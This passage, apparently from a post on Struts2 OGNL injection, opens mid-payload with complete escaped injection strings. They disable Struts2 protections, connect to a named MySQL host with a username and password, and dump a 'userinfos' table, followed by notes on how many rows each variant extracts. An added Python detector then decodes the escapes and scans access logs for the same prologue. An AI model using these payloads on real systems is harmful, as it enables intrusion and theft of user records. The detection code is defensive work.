22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
The second row is \43rs.next()%2b\43rs.next(), i.e. two of them
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()%2b\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
The third row is three of them.
The fourth row is four: \43rs.next()%2b\43rs.next()%2b\43rs.next()%2b\43rs.next()
It seems the maximum is only a little over 200.
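Every payload on this page shares one prologue (`#_memberAccess.allowStaticMethodAccess`, `denyMethodExecution`, `@class@method` static calls) hidden behind three escape layers: URL percent-encoding, OGNL `\u0023`-style unicode escapes and `\43`-style octal escapes. The following is an added detection example, not code from the original post: it normalises those layers and scans query strings or access-log lines for the decoded prologue. The indicator names, the log format and the sample log lines are constructed assumptions.

```python
r"""Detect obfuscated Struts2/OGNL injection attempts of the kind shown above.

A signature that only looks for the literal "#_memberAccess" misses payloads
written as \43_memberAccess or \u0023_memberAccess, so the escapes are undone
first and the indicators are matched against the decoded text.
"""
import re
from urllib.parse import unquote_plus

# One pass over both OGNL escape forms, so a character produced by one escape
# is never re-read as the start of another (\u0023 -> '#', \43 -> '#', \75 -> '=').
_OGNL_ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})')

# Indicators taken from the payload prologue on this page.  The static-call
# pattern is the broadest one and may also match e-mail-like text; treat it
# as corroborating rather than conclusive on its own.
INDICATORS = {
    "member_access_prologue": re.compile(r'#_memberAccess'),
    "allow_static_method":    re.compile(r'allowStaticMethodAccess'),
    "deny_method_execution":  re.compile(r'denyMethodExecution'),
    "ognl_static_call":       re.compile(r'@[A-Za-z_][\w.]*@[A-Za-z_]\w*'),
    "context_access":         re.compile(r'#context\['),
}


def _decode_ognl_escape(m):
    uni, octal = m.group(1), m.group(2)
    return chr(int(uni, 16)) if uni is not None else chr(int(octal, 8))


def normalize(raw):
    """Strip URL encoding, then OGNL unicode/octal escapes, from a query string."""
    return _OGNL_ESCAPE.sub(_decode_ognl_escape, unquote_plus(raw))


def scan_query(raw_query):
    """Return the indicators that fire on a query string, plus its decoded form.

    The decoded form is what belongs in the alert: it shows the actual OGNL
    rather than the escaped bytes that were on the wire.
    """
    decoded = normalize(raw_query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"hits": hits, "decoded": decoded}


# Minimal parser for the request field of a common/combined access-log line.
_LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Yield (line_no, hits, decoded_query) for each log line that trips an indicator."""
    for n, line in enumerate(lines, 1):
        m = _LOG_REQUEST.search(line)
        if not m:
            continue
        _, _, query = m.group("target").partition("?")
        if not query:
            continue
        result = scan_query(query)
        if result["hits"]:
            yield n, result["hits"], result["decoded"]


# Constructed sample log lines (assumed format; not from any real server).
# The first is an ordinary request; the second carries the page's os.name
# prologue in its octal-escaped form.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /index.action?request_locale=zh_TW HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:10:00:07 +0000] "GET /index.action?request_locale=zh_TW&'
    r"('\43_memberAccess.allowStaticMethodAccess')(a)=true"
    r"&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))"
    r"&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))"
    ' HTTP/1.1" 200 42',
]

if __name__ == "__main__":
    for line_no, hits, decoded in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}")
        print("  decoded:", decoded[:120])
```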